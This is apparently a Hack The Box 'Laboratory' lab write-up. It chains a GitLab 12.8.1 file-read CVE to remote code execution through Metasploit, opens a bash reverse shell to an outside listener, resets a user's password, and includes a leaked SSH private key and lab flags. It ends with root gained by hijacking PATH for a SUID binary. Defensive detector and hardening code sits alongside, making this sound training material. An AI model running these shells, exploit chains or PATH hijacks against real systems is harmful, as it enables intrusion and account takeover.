HTB Laboratory done
Laboratory
Notes
git.laboratory.htb
OS:
Linux
Technology:
GitLab Community Edition 12.8.1
IP Address:
10.129.168.236
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
Users and pass:
Register a new user - gitlab
U: janjanjan
M: [email protected]
P: qwerty123
---
Changed password for user dexter:
U: dexter
P: qwerty123
Nmap: 10.129.168.236
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.168.236_nmap 10.129.168.236 ; cat 10.129.168.236_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 12:15 CEST
Nmap scan report for 10.129.168.236
Host is up (0.18s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
| 256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_ 256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to https://laboratory.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_ssl-date: TLS randomness does not represent time
|_http-title: The Laboratory
|_http-server-header: Apache/2.4.41 (Ubuntu)
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ cat /etc/hosts | grep lab
10.129.168.236 laboratory.htb git.laboratory.htb
ffuf - http://laboratory.htb/FUZZ
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ ffuf -u http://laboratory.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o laboratory.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://laboratory.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : laboratory.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [163752/163752] :: Job [1/1] :: 546 req/sec :: Duration: [0:06:04] :: Errors: 0 ::
ffuf - https://laboratory.htb/FUZZ
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ ffuf -u https://laboratory.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o laboratory.htb_443_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://laboratory.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : laboratory.htb_443_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
assets [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 46ms]
[INFO] Adding a new job to the queue: https://laboratory.htb/assets/FUZZ
images [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 31ms]
[INFO] Adding a new job to the queue: https://laboratory.htb/images/FUZZ
index.html [Status: 200, Size: 7254, Words: 426, Lines: 210, Duration: 63ms]
[INFO] Starting queued job on target: https://laboratory.htb/assets/FUZZ
css [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 59ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://laboratory.htb/assets/css/
fonts [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 92ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://laboratory.htb/assets/fonts/
js [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 36ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://laboratory.htb/assets/js/
[INFO] Starting queued job on target: https://laboratory.htb/images/FUZZ
:: Progress: [163752/163752] :: Job [3/3] :: 20 req/sec :: Duration: [0:13:00] :: Errors: 0 ::
ffuf - https://git.laboratory.htb/FUZZ
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ ffuf -u https://git.laboratory.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o git.laboratory.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://git.laboratory.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : git.laboratory.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
fQmTERmZ [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 88ms]
!_archives.html [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 724ms]
!_images.html [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 731ms]
!_images.txt [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 100ms]
!backup.html [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 641ms]
!backup.git [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 642ms]
!.md [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 697ms]
!_images [Status: 302, Size: 105, Words: 5, Lines: 1, Duration: 671ms]
ffuf - vhost brute force, Host: FUZZ.laboratory.htb
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ ffuf -u https://laboratory.htb -H "Host: FUZZ.laboratory.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac -of all
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://laboratory.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.laboratory.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
git [Status: 429, Size: 12, Words: 2, Lines: 2, Duration: 420ms]
#www [Status: 400, Size: 307, Words: 26, Lines: 11, Duration: 407ms]
#mail [Status: 400, Size: 307, Words: 26, Lines: 11, Duration: 552ms]
akita [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 527ms]
csd [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 3129ms]
:: Progress: [19966/19966] :: Job [1/1] :: 353 req/sec :: Duration: [0:06:00] :: Errors: 0 ::
Add subdomain to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ cat /etc/hosts | grep lab
10.129.185.193 laboratory.htb git.laboratory.htb akita.laboratory.htb csd.laboratory.htb
Register a new user
U: janjanjan
M: [email protected]
P: qwerty123
Find gitlab version
https://git.laboratory.htb/help
GitLab Community Edition 12.8.1
Exploit: CVE-2020-10977 (GitLab CE/EE 8.5 to 12.9.0, fixed in 12.9.1) - arbitrary file read; 12.8.1 is in range. An issue description containing an upload reference with ../ segments (![a](/uploads/<32 hex>/../../../<target>)) is rewritten when the issue is moved to another project, and the referenced file is copied into the new project's uploads, so any file readable by the git user can be fetched, e.g. /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml. That file holds secret_key_base, with which an attacker can sign a Rails cookie (experimentation_subject_id) carrying a marshalled object that executes code when GitLab deserialises it.
Metasploit: exploit/multi/http/gitlab_file_read_rce (chains the file read and the forged-cookie RCE; the two projects and the issue it creates are the move-issue trick)
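The file-read half of the chain comes down to a path join with no containment check. The block below is an added example (my code, not GitLab's and not from the page): it scans an issue body for upload references that escape the upload root the way the unpatched rewriter would resolve them, and shows the hardened join that rejects them. UPLOADS_ROOT is an assumed directory, not GitLab's real per-project layout, and SAMPLE_ISSUE is constructed, using the secrets.yml path and the 15-level traversal depth the Metasploit run above used.

```python
import os
import re

# Assumed upload root (not GitLab's real per-project layout); only the
# containment logic matters for the demonstration.
UPLOADS_ROOT = "/var/opt/gitlab/gitlab-rails/uploads"

# Markdown image/link to a GitLab upload: /uploads/<32-hex secret>/<filename>
UPLOAD_REF = re.compile(r"\]\((/uploads/([0-9a-f]{32})/([^)\s]+))\)")


class PathTraversal(ValueError):
    pass


def resolve_upload_unchecked(root, secret, filename):
    """Pre-fix behaviour: the user-controlled filename is joined under the
    upload root and nothing checks that the result still lies beneath it."""
    return os.path.normpath(os.path.join(root, secret, filename))


def safe_upload_path(root, secret, filename):
    """Hardened join: reject absolute names and .. components, normalise,
    then require the result to stay under root."""
    root = os.path.normpath(root)
    if os.path.isabs(filename) or ".." in filename.split("/"):
        raise PathTraversal(f"rejected upload filename {filename!r}")
    candidate = os.path.normpath(os.path.join(root, secret, filename))
    if not candidate.startswith(root + os.sep):
        raise PathTraversal(f"{filename!r} escapes {root}")
    return candidate


def is_rejected(root, secret, filename):
    """True when safe_upload_path refuses the filename."""
    try:
        safe_upload_path(root, secret, filename)
    except PathTraversal:
        return True
    return False


def find_traversals(markdown, root=UPLOADS_ROOT):
    """Scan an issue/MR description for upload references that, resolved the
    unchecked way, land outside the upload root. One dict per hit."""
    root = os.path.normpath(root)
    hits = []
    for m in UPLOAD_REF.finditer(markdown):
        ref, secret, filename = m.groups()
        resolved = resolve_upload_unchecked(root, secret, filename)
        if not resolved.startswith(root + os.sep):
            hits.append({"ref": ref, "resolves_to": resolved})
    return hits


# Constructed issue body: one legitimate attachment and one CVE-2020-10977-style
# reference with enough ../ to climb out of any plausible upload root.
SAMPLE_ISSUE = (
    "Build fails on master, log attached.\n"
    "![log](/uploads/3f9a0c1d2e5b4a7c8d9e0f1a2b3c4d5e/build.log)\n"
    "![a](/uploads/11111111111111111111111111111111/"
    + "../" * 15
    + "opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)\n"
)

if __name__ == "__main__":
    for hit in find_traversals(SAMPLE_ISSUE):
        print(f"traversal: {hit['ref']} -> {hit['resolves_to']}")
    print(safe_upload_path(UPLOADS_ROOT, "3f9a0c1d2e5b4a7c8d9e0f1a2b3c4d5e", "build.log"))
```

On a real instance the same scan can be run over issue descriptions exported from the database or over the rails production log to find earlier attempts; the surplus ../ segments are harmless to the attacker (the kernel and normpath both stop at /) but are a strong signal in logs.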
Setup exploit
msf6 exploit(multi/http/gitlab_file_read_rce) > show options
Module options (exploit/multi/http/gitlab_file_read_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 15 yes Define the max traversal depth
PASSWORD qwerty123 no The password for the specified username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS 10.129.15.143 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SECRETS_PATH /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml yes The path to the secrets.yml file
SECRET_KEY_BASE no The known secret_key_base from the secrets.yml - this skips the arbitrary file read if present
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI /users/sign_in yes The path to the vulnerable application
USERNAME janjanjan no The username to authenticate as
VHOST git.laboratory.htb no HTTP server virtual host
Payload options (ruby/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.63 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
Create revshell
msf6 exploit(multi/http/gitlab_file_read_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.63:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
[*] Logged in to user janjanjan
[*] Created project /janjanjan/5pb1uFSu
[*] Created project /janjanjan/SCGrMTNy
[*] Created issue /janjanjan/5pb1uFSu/issues/1
[*] Executing arbitrary file load
[+] File saved as: '/home/kali/.msf4/loot/20250728123332_default_10.129.15.143_gitlab.secrets_614486.txt'
[+] Extracted secret_key_base 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
[*] NOTE: Setting the SECRET_KEY_BASE option with the above value will skip this arbitrary file read
[*] Attempting to delete project /janjanjan/5pb1uFSu
[*] Deleted project /janjanjan/5pb1uFSu
[*] Attempting to delete project /janjanjan/SCGrMTNy
[*] Deleted project /janjanjan/SCGrMTNy
[*] Command shell session 3 opened (10.10.14.63:4444 -> 10.129.15.143:43918) at 2025-07-28 12:33:42 +0200
help
Meta shell commands
===================
Command Description
------- -----------
help Help menu
background Backgrounds the current shell session
sessions Quickly switch to another session
resource Run a meta commands script stored in a local file
shell Spawn an interactive shell (*NIX Only)
download Download files
upload Upload files
source Run a shell script on remote machine (*NIX Only)
irb Open an interactive Ruby shell on the current session
pry Open the Pry debugger on the current session
.<command> Prefix any built-in command on this list with a '.' to execute in the underlying shell (ex: .help)
For more info on a specific command, use <command> -h or help <command>.
shell
[*] Trying to find binary 'python' on the target machine
[-] python not found
[*] Trying to find binary 'python3' on the target machine
[*] Found python3 at /opt/gitlab/embedded/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
echo os.system('/bin/bash')
git@git:~/gitlab-rails/working$ echo os.system('/bin/bash')
bash: syntax error near unexpected token `('
python -c 'import pty; pty.spawn("/bin/bash")'
<ing$ python -c 'import pty; pty.spawn("/bin/bash")'
bash: python: command not found
whereis bash
git@git:~/gitlab-rails/working$ whereis bash
bash: /bin/bash /etc/bash.bashrc /usr/share/man/man1/bash.1.gz
/bin/bash -i
git@git:~/gitlab-rails/working$ /bin/bash -i
sh -i >& /dev/tcp/10.10.14.63/4000 0>&1
git@git:~/gitlab-rails/working$ sh -i >& /dev/tcp/10.10.14.63/4000 0>&1
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Laboratory/gitlab-file-read-exploit]
└─$ netcat -lvnp 4000
listening on [any] 4000 ...
connect to [10.10.14.63] from (UNKNOWN) [10.129.15.143] 57854
$
Spawn TTY (on the new shell on port 4000)
script /dev/null -c bash
CTRL+Z
stty raw -echo ; fg
reset
(answer the "Terminal type?" prompt with: screen)
Change password for user: dexter (gitlab). User.find(1) is the first account on the instance, here dexter. Note that save! enqueues a password-change notification through Sidekiq (see the ActionMailer line below) and replaces the real user's credential, so this is noisy and destructive.
U: dexter
P: qwerty123
---
git@git:~/gitlab-rails/working$
git@git:~/gitlab-rails/working$ whereis gitlab-rails
gitlab-rails: /usr/bin/gitlab-rails /opt/gitlab/bin/gitlab-rails
git@git:~/gitlab-rails/working$ gitlab-rails console
--------------------------------------------------------------------------------
GitLab: 12.8.1 (d18b43a5f5a) FOSS
GitLab Shell: 11.0.0
PostgreSQL: 10.12
--------------------------------------------------------------------------------
Loading production environment (Rails 6.0.2)
irb(main):001:0> user = User.find(1)
user = User.find(1)
=> #<User id:1 @dexter>
irb(main):002:0> user.password = "qwerty123"
user.password = "qwerty123"
=> "qwerty123"
irb(main):003:0> user.password_confirmation = "qwerty123"
user.password_confirmation = "qwerty123"
=> "qwerty123"
irb(main):004:0> user.save!
user.save!
Enqueued ActionMailer::DeliveryJob (Job ID: 6deb2588-1f72-4417-b9d4-84d20906bb3c) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<GlobalID:0x00007f8781a3aa60 @uri=#<URI::GID gid://gitlab/User/1>>
=> true
irb(main):005:0>
Read id_rsa for user: dexter
https://git.laboratory.htb/dexter/securedocker/-/blob/master/dexter/.ssh/id_rsa
---
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAsZfDj3ASdb5YS3MwjsD8+5JvnelUs+yI27VuDD7P21odSfNUgCCt
oSE+v8sPNaB/xF0CVqQHtnhnWe6ndxXWHwb34UTodq6g2nOlvtOQ9ITxSevDScM/ctI6h4
2dFBhs+8cW9uSxOwlFR4b70E+tv3BM3WoWgwpXvguP2uZF4SUNWK/8ds9TxYW6C1WkAC8Z
25M7HtLXf1WuXU/2jnw29bzgzO4pJPvMHUxXVwN839jATgQlNp59uQDBUicXewmp/5JSLr
OPQSkDrEYAnJMB4f9RNdybC6EvmXsgS9fo4LGyhSAuFtT1OjqyOY1uwLGWpL4jcDxKifuC
MPLf5gpSQHvw0fq6/hF4SpqM4iXDGY7p52we0Kek3hP0DqQtEvuxCa7wpn3I1tKsNmagnX
dqB3kIq5aEbGSESbYTAUvh45gw2gk0l+3TsOzWVowsaJq5kCyDm4x0fg8BfcPkkKfii9Kn
NKsndXIH0rg0QllPjAC/ZGhsjWSRG49rPyofXYrvAAAFiDm4CIY5uAiGAAAAB3NzaC1yc2
EAAAGBALGXw49wEnW+WEtzMI7A/PuSb53pVLPsiNu1bgw+z9taHUnzVIAgraEhPr/LDzWg
f8RdAlakB7Z4Z1nup3cV1h8G9+FE6HauoNpzpb7TkPSE8Unrw0nDP3LSOoeNnRQYbPvHFv
bksTsJRUeG+9BPrb9wTN1qFoMKV74Lj9rmReElDViv/HbPU8WFugtVpAAvGduTOx7S139V
rl1P9o58NvW84MzuKST7zB1MV1cDfN/YwE4EJTaefbkAwVInF3sJqf+SUi6zj0EpA6xGAJ
yTAeH/UTXcmwuhL5l7IEvX6OCxsoUgLhbU9To6sjmNbsCxlqS+I3A8Son7gjDy3+YKUkB7
8NH6uv4ReEqajOIlwxmO6edsHtCnpN4T9A6kLRL7sQmu8KZ9yNbSrDZmoJ13agd5CKuWhG
xkhEm2EwFL4eOYMNoJNJft07Ds1laMLGiauZAsg5uMdH4PAX3D5JCn4ovSpzSrJ3VyB9K4
NEJZT4wAv2RobI1kkRuPaz8qH12K7wAAAAMBAAEAAAGAH5SDPBCL19A/VztmmRwMYJgLrS
L+4vfe5mL+7MKGp9UAfFP+5MHq3kpRJD3xuHGQBtUbQ1jr3jDPABkGQpDpgJ72mWJtjB1F
kVMbWDG7ByBU3/ZCxe0obTyhF9XA5v/o8WTX2pOUSJE/dpa0VLi2huJraLwiwK6oJ61aqW
xlZMH3+5tf46i+ltNO4BEclsPJb1hhHPwVQhl0Zjd/+ppwE4bA2vBG9MKp61PV/C0smYmr
uLPYAjxw0uMlfXxiGoj/G8+iAxo2HbKSW9s4w3pFxblgKHMXXzMsNBgePqMz6Xj9izZqJP
jcnzsJOngAeFEB/FW8gCOeCp2FmP4oL08+SknvEUPjWM+Wl/Du0t6Jj8s9yqNfpqLLbJ+h
1gQdZxxHeSlTCuqnat4khVUJ8zZlBz7B9xBE7eItdAVmGcrM9ztz9DsrLVTBLzIjfr29my
7icbK30MnPBbFKg82AVDPdzl6acrKMnV0JTm19JnDrvWZD924rxpFCXDDcfAWgDr2hAAAA
wCivUUYt2V62L6PexreXojzD6aZMm2qZk6e3i2pGJr3sL49C2qNOY9fzDjCOyNd8S5fA14
9uNAEMtgMdxYrZZAu8ymwV9dXfI6x7V8s+8FCOiU2+axL+PBSEpsKEzlK37+iZ3D1XgYgM
4OYqq39p4wi8rkEaNVuJKYFo8FTHWVcKs3Z/y0NVGhPeaaQw3cAHjUv//K0duKA/m/hW8T
WVAs1IA5kND4sDrNOybRWhPhzLonJKhceVveoDsnunSw/vLgAAAMEA5+gJm0gypock/zbc
hjTa+Eb/TA7be7s2Ep2DmsTXpKgalkXhxdSvwiWSYk+PHj0ZO9BPEx9oQGW01EFhs1/pqK
vUOZ07cZPMI6L1pXHAUyH3nyw56jUj2A3ewGOd3QoYDWS+MMSjdSgiHgYhO09xX4LHf+wc
N2l+RkOEv7ZbOQedBxb+4Zhw+sgwIFVdLTblQd+JL4HIkNZyNXv0zOnMwE5jMiEbJFdhXg
LOCTp45CWs7aLIwkxBPN4SIwfcGfuXAAAAwQDECykadz2tSfU0Vt7ge49Xv3vUYXTTMT7p
7a8ryuqlafYIr72iV/ir4zS4VFjLw5A6Ul/xYrCud0OIGt0El5HmlKPW/kf1KeePfsHQHS
JP4CYgVRuNmqhmkPJXp68UV3djhA2M7T5j31xfQE9nEbEYsyRELOOzTwnrTy/F74dpk/pq
XCVyJn9QMEbE4fdpKGVF+MS/CkfE+JaNH9KOLvMrlw0bx3At681vxUS/VeISQyoQGLw/fu
uJvh4tAHnotmkAAAAPcm9vdEBsYWJvcmF0b3J5AQIDBA==
-----END OPENSSH PRIVATE KEY-----
Read flag: user.txt
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ chmod 0700 id_rsa
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Laboratory]
└─$ ssh -i id_rsa dexter@laboratory.htb
dexter@laboratory:~$
dexter@laboratory:~$ id
uid=1000(dexter) gid=1000(dexter) groups=1000(dexter)
dexter@laboratory:~$ cd ~
dexter@laboratory:~$ ls -a
. .. .bash_history .bash_logout .bashrc .cache .gnupg .local .profile .ssh user.txt
dexter@laboratory:~$
dexter@laboratory:~$ cat user.txt
80277cf4e62f8437b9ea74f7113d0ab3
dexter@laboratory:~$
Privilege Escalation
Find SUID app
dexter@laboratory:~$ find / -perm -4000 2>/dev/null | grep bin | grep -v snap
/usr/local/bin/docker-security
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/fusermount
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/at
/usr/bin/umount
/usr/bin/chsh
/usr/bin/mount
/usr/bin/passwd
dexter@laboratory:~$
dexter@laboratory:~$ ls -la /usr/local/bin/docker-security
-rwsr-xr-x 1 root dexter 16720 Aug 28 2020 /usr/local/bin/docker-security
dexter@laboratory:~$
dexter@laboratory:~$ ltrace /usr/local/bin/docker-security
setuid(0) = -1
setgid(0) = -1
system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 256
system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 256
+++ exited (status 0) +++
dexter@laboratory:~$
Note on the ltrace output: setuid(0)/setgid(0) return -1 and both chmod calls fail with "Operation not permitted" only because a SUID binary run under ptrace does not get its elevated privileges; executed normally it runs as root. The actual bug is that system() hands a bare command name (chmod) to /bin/sh, which resolves it through the caller's PATH, so any writable directory placed first in PATH wins. The fix is an absolute path (/bin/chmod), or better execve() without a shell and a fixed environment.
Priv Esc: PATH hijack of chmod
dexter@laboratory:~$ export PATH=/tmp:$PATH
dexter@laboratory:~$
dexter@laboratory:~$ echo "/bin/bash" > /tmp/chmod ; chmod a+x /tmp/chmod
dexter@laboratory:~$
dexter@laboratory:~$ /usr/local/bin/docker-security
root@laboratory:~#
root@laboratory:~# id
uid=0(root) gid=0(root) groups=0(root),1000(dexter)
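The PATH hijack above works against any SUID helper that shells out with a bare command name. The block below is an added example (my code, not from the box or the page): it pulls bare command strings out of a binary image the way a quick `strings` audit would, shows PATH resolution with the same first-match rule /bin/sh applies for system(), and gives the hardened invocation. SAFE_PATH and SHELL_UTILS are my assumptions, SAMPLE_STRINGS is a constructed stand-in for docker-security's strings (the two chmod lines from the ltrace output plus ELF filler), and nothing privileged is executed; the planted file is only resolved, never run.

```python
import os
import re
import shutil
import stat
import subprocess
import tempfile

# PATH a privileged helper should use instead of inheriting the caller's (assumed).
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"

# Utilities commonly shelled out to from SUID helpers (assumed list).
SHELL_UTILS = {"chmod", "chown", "cp", "mv", "rm", "cat", "tar",
               "service", "systemctl", "docker", "mount", "umount"}


def bare_commands(blob):
    """Audit step: take printable strings from a binary image and return the
    ones whose first word is a utility named without a leading /, i.e. what a
    system("...") call hands to /bin/sh to resolve through PATH."""
    found = []
    for run in re.findall(rb"[\x20-\x7e]{4,}", blob):
        first = run.split(b" ", 1)[0].decode("ascii")
        if first in SHELL_UTILS:
            found.append(run.decode("ascii"))
    return found


def resolve_like_sh(cmd, path):
    """Which file a bare command name runs under the given PATH: the first
    executable match in order, the rule /bin/sh applies for system(3)."""
    return shutil.which(cmd, path=path)


def plant_fake(dirname, cmd):
    """Attacker side: an executable named after the command the SUID binary
    will run. A script without a shebang is still executed by sh, as on the box."""
    fake = os.path.join(dirname, cmd)
    with open(fake, "w") as fh:
        fh.write("/bin/bash\n")
    os.chmod(fake, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)
    return fake


def demo_hijack(cmd="chmod"):
    """Returns (hijacked, clean): whether the planted file wins once its
    directory is prepended to PATH, and what the same name resolves to under
    SAFE_PATH. Resolution only; nothing is executed."""
    with tempfile.TemporaryDirectory() as d:
        fake = plant_fake(d, cmd)
        attacker_path = d + os.pathsep + SAFE_PATH
        hijacked = resolve_like_sh(cmd, attacker_path) == fake
        clean = resolve_like_sh(cmd, SAFE_PATH)
    return hijacked, clean


def run_privileged_step(argv):
    """How the chmod calls should be issued from a privileged helper: absolute
    path, argv list (no shell), and an environment the caller cannot influence."""
    if not os.path.isabs(argv[0]):
        raise ValueError("privileged exec requires an absolute path")
    return subprocess.run(argv, env={"PATH": SAFE_PATH}, shell=False, check=False).returncode


# Constructed stand-in for `strings /usr/local/bin/docker-security`.
SAMPLE_STRINGS = (
    b"/lib64/ld-linux-x86-64.so.2\x00libc.so.6\x00system\x00setuid\x00"
    b"chmod 700 /usr/bin/docker\x00chmod 660 /var/run/docker.sock\x00GCC: (Ubuntu) 9.3.0\x00"
)

if __name__ == "__main__":
    print("bare commands:", bare_commands(SAMPLE_STRINGS))
    hijacked, clean = demo_hijack()
    print(f"planted chmod wins with attacker PATH: {hijacked}; under SAFE_PATH: {clean}")
    print("hardened call exit code:", run_privileged_step(["/bin/true"]))
```

Running bare_commands over the SUID list from the find above (read each file as bytes) is a fast triage for this whole bug class; anything it flags deserves the ltrace look that was done here.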
Read flag: root.txt
root@laboratory:~# id
uid=0(root) gid=0(root) groups=0(root),1000(dexter)
root@laboratory:~#
root@laboratory:~# cd /root
root@laboratory:/root#
root@laboratory:/root# ls -a
. .. .bash_history .bashrc .cache .config .local .profile root.txt .selected_editor .ssh .vim .viminfo
root@laboratory:/root#
root@laboratory:/root# cat root.txt
9008d79a21832b3458158d2578052dc0
References
Lessons Learned